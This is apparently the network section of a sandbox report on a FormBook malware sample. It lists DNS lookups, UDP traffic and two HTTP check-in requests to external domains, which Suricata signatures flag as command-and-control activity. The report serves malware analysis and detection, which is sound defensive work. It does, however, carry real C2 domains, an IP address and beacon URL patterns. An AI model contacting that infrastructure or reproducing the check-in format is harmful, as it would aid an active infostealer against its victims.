Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.blueridgeholisticdental.com | 34.102.136.180 | |
www.3556a.com | 104.233.238.207 |
- UDP Requests
-
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:61459 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
192.168.56.102:56758 239.255.255.250:3702
-
GET
404
http://www.3556a.com/nke/?_FNHAt=tVBl4PYHXHBx&8pdPzj6X=Bu2S3uDiR9mXo57lDy6P1wh5eo8lJZxkJjBrRWLCJOJBpLyy7hXoE5ZXA8FCgXkaMfNP2bVp
REQUEST
RESPONSE
BODY
GET /nke/?_FNHAt=tVBl4PYHXHBx&8pdPzj6X=Bu2S3uDiR9mXo57lDy6P1wh5eo8lJZxkJjBrRWLCJOJBpLyy7hXoE5ZXA8FCgXkaMfNP2bVp HTTP/1.1
Host: www.3556a.com
Connection: close
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Tue, 25 May 2021 23:37:59 GMT
Connection: close
Content-Length: 2885
GET
403
http://www.blueridgeholisticdental.com/nke/?8pdPzj6X=beluo/A3x1wk0axcPPYLRI6VL5KZoBZCIza2nCls1jNtqOSK3OGdLiR1PhbzTLTJ4aTYYmbD&_FNHAt=tVBl4PYHXHBx
REQUEST
RESPONSE
BODY
GET /nke/?8pdPzj6X=beluo/A3x1wk0axcPPYLRI6VL5KZoBZCIza2nCls1jNtqOSK3OGdLiR1PhbzTLTJ4aTYYmbD&_FNHAt=tVBl4PYHXHBx HTTP/1.1
Host: www.blueridgeholisticdental.com
Connection: close
HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 26 May 2021 00:08:55 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60a0a2b0-113"
Via: 1.1 google
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49810 -> 104.233.238.207:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49810 -> 104.233.238.207:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49810 -> 104.233.238.207:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts